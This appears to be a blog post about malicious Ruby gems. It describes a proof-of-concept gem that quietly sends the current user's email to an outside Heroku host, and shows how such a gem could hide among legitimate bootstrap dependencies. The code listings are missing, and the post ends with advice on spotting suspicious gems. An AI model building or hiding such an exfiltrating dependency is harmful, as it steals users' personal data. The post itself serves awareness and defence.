Installing a gem allows that gem’s code to run in the context of your application. Clearly this has security implications: installing a malicious gem on a server could ultimately result in that server being completely penetrated by the gem’s author. Because of this, the security of gem code is a topic of active discussion within the Ruby community. Rubygems.org documentation
It should be obvious to everyone that when you install a gem you don’t know, never used or had a look at its source code - it could be a bad idea.
What could go wrong?
After installing this gem, I started thinking about how easily I believed this gem is related to the bootstrap plugin and how fast I added it to the project’s Gemfile.
What if it wasn’t doing what it is supposed to do, but just an eye catching name for a melicious code?
Introducing - bootstrap_buttons (Please, do not install this gem)
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23
Long story short - it will send the current logged in user’s email address to
http://bootstrap-buttons.herokuapp.com and then continue to genereate your form like nothing evil happened.
How is this dangerous?
Aside from the fact that single look at this gem will reveal its true evil identity - what happens if someone installs this gem without paying attention to it? (as in, being a dependency for a bigger spoofed bootstrap bundle):
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26
add_dependency lines are cool - those are legitimate bootstrap extensions gems - wrapped as rails engines to allow easy integration in rails apps.
bootstrap_buttons hiding there? seems legit right? it will still post your user’s email address to the remote host.
What to do?
Well, just like in any of the other options suggested by the Ruby community to improve gem security and trust - there is no silver bullet. A blind trust is not a good thing unless you absolutely know what you are using and when it is coming from (a.k.a “your own code”).
Installing OS code into your application needs a little touch of Paranoia, there is no need to go over all the code you’ll ever add to your app - but a skim browsing over it could be a nice precaution
While skimming through gem could, the following flags should rise your suspicion a bit.
- Using HTTP interface that is not part of the gem. (You would expect an API library to use HTTP requests - but not one that is supposed to add some neat themes)
- Session access. Gems that access your session should be investigate more thoroughly